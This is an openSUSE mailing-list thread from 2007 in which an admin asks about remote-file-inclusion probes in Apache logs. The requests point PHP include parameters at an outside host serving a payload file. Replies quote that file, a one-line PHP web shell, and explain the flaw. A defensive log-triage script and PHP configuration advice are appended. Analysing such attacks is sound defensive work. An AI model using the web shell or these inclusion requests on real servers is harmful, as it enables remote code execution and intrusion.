[opensuse] Apache access log errors - attack?
Hello,

I found these errors in our web logs and it appears that either there is a PHP attack on the apache site or perhaps a kit on the server?

Errors below (profanity not mine);

69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:10 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /modules/Forums/admin/index.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /dokeos/claroline/auth/ldap/authldap.php?includePath=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /modules/mx_links/language/lang_english/lang_admin.php?mx_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /index.php?page=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 200 12222 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /admin/includes/createemails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /admin/includes/send_emails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /createemails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /send_emails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
<snip>

It looks like they are getting a '404' error 'page not found', although these requests are not a welcomed sight.

Thank you,

~James

On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
> Hello,
>
> I found these errors in our web logs and it appears that either there is a PHP attack on the apache site or perhaps a kit on the server?
>
> Errors below (profanity not mine);
>
> 69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"

Looks like some kind of PHP include attack scanner, against lots of PHP apps.

M.txt contains:

<? system($_GET['cmd']); die ("Morfeus hacked you"); ?>

ciao, Marcus

On Wednesday 25 April 2007 14:48, Marcus Meissner wrote:
> On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
>> Hello,
>>
>> I found these errors in our web logs and it appears that either there is a PHP attack on the apache site or perhaps a kit on the server?
>>
>> Errors below (profanity not mine);
>>
>> 69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
>
> Looks like some kind of PHP include attack scanner, against lots of PHP apps.

It looks like an indirect injection exploit--getting the hacker's code to run in the environment of the server to which it is sent. Is PHP really so trusting as to load and execute remote code in the manner suggested by this attack? Similar things are possible with database applications when the author naively uses string concatenation to combine template query fragments with user-supplied parameters.

> M.txt contains: <? system($_GET['cmd']); die ("Morfeus hacked you"); ?>

Looks like:
a) Morfeus doesn't spell very well.
b) Morfeus knows only Windows.
c) Morfeus is kind of rude.

> ciao, Marcus

Randall Schulz

James D. Parra wrote:
> Hello,
>
> I found these errors in our web logs and it appears that either there is a PHP attack on the apache site or perhaps a kit on the server?
>
> Errors below (profanity not mine);
>
> 69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"

Remote code execution attack on some PHPbb mods; the other ones attempted to exploit holes in applications like mambo CMS that have code affected by the $GLOBAL overwrite PHP vulnerability http://www.hardened-php.net/advisory_202005.79.html

participants (4)
- Cristian Rodriguez R.
- James D. Parra
- Marcus Meissner
- Randall R Schulz
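
A triage sketch for the log excerpt discussed in this thread, added here as an example and not written by any of the participants: it parses Apache combined-format lines, flags requests where a query parameter's value is itself a remote URL, and separates the 404 misses from the one request that returned 200. The function names and the third (benign) sample line are constructed for illustration; the first two sample lines are taken from the excerpt above.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>.*?) HTTP/[\d.]+\s*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
# A parameter whose value starts with a URL scheme is the remote-include pattern seen here.
REMOTE_VALUE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def classify(line):
    """Return a finding dict for a remote-include probe, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m['target'].partition('?')
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_VALUE.match(value):
            status = int(m['status'])
            return {
                'host': m['host'], 'path': path, 'param': name,
                'remote': value, 'status': status, 'agent': m['agent'],
                # Below 400 the targeted script exists and answered: review it first.
                'verdict': 'investigate' if status < 400 else 'probe-miss',
            }
    return None

def triage(lines):
    """All findings, with the ones that need investigation sorted to the front."""
    hits = [h for h in map(classify, lines) if h]
    return sorted(hits, key=lambda h: h['verdict'] != 'investigate')

SAMPLE_LINES = [
    # From the thread (mail line-wrap removed):
    '69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php'
    '?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" '
    '"Morfeus Fucking Scanner"',
    '69.94.131.24 - - [02/Apr/2007:09:34:11 -0700] "GET /index.php'
    '?page=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 200 12222 "-" '
    '"Morfeus Fucking Scanner"',
    # Constructed benign request for contrast:
    '192.0.2.10 - - [02/Apr/2007:09:35:00 -0700] "GET /index.php?page=about HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_LINES):
        print(hit['verdict'], hit['status'], hit['path'], hit['param'])
```

A 200 on such a request does not prove the remote file was included; it means the targeted script exists and answered, so its handling of that parameter is what needs review. On the PHP side, `allow_url_include = Off` (available from PHP 5.2.0, with `allow_url_fopen = Off` where remote fopen is not needed) is the setting that stops `include()` from fetching such URLs.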